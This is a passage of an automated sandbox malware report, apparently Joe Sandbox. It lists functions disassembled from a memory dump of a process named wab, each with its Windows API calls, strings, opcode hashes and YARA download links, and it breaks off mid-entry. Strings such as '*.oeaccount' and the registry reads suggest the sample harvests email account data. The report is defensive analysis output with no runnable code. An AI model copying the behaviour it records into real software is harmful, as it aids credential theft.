                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404883 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CFC5 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          • Opcode ID: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                          • Instruction ID: 593c26daf5a8157ef64f6677eb97e14ee4fb597551c84e1e3d2c0423d94ab2b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01FCB5A40B0077E235AA35CC03F1A73A4AFD1718F000B1EF252666D2E7BCE509856D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041546A Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: +MA$psow$winOpen
                                                                                                                                                                                          • API String ID: 2221118986-3077801942
                                                                                                                                                                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042BB86 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                          • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                          • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042F55D Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                          • API String ID: 3510742995-3459038510
                                                                                                                                                                                          • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                          • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402616 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593657333-0
                                                                                                                                                                                          • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                          • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C5D8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3798638045-0
                                                                                                                                                                                          • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                          • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B340 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                          • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4107816708-0
                                                                                                                                                                                          • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                          • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443946 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                          • String ID: >$>$>
                                                                                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                                                                                          • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                          • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CF27 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                          • Opcode ID: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                          • Instruction ID: c67b832eded58a7fed5fb718e1005b1d96f95c91eedcc3159726feab918c483c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB113BF2900705ABCB248F15CCC095A77A9EB94358B00073FFE06562D1E635DA5986DA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004076FD Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                          • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                          • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407D33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                          • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410880 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1479990042-0
                                                                                                                                                                                          • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                          • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B65E Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 203655857-0
                                                                                                                                                                                          • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                          • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AB21 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                          • API String ID: 3699762281-259020660
                                                                                                                                                                                          • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                          • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044497B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                          • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004021F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _ultoasprintf
                                                                                                                                                                                          • String ID: %s %s %s
                                                                                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                                                                                          • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                          • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004086A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
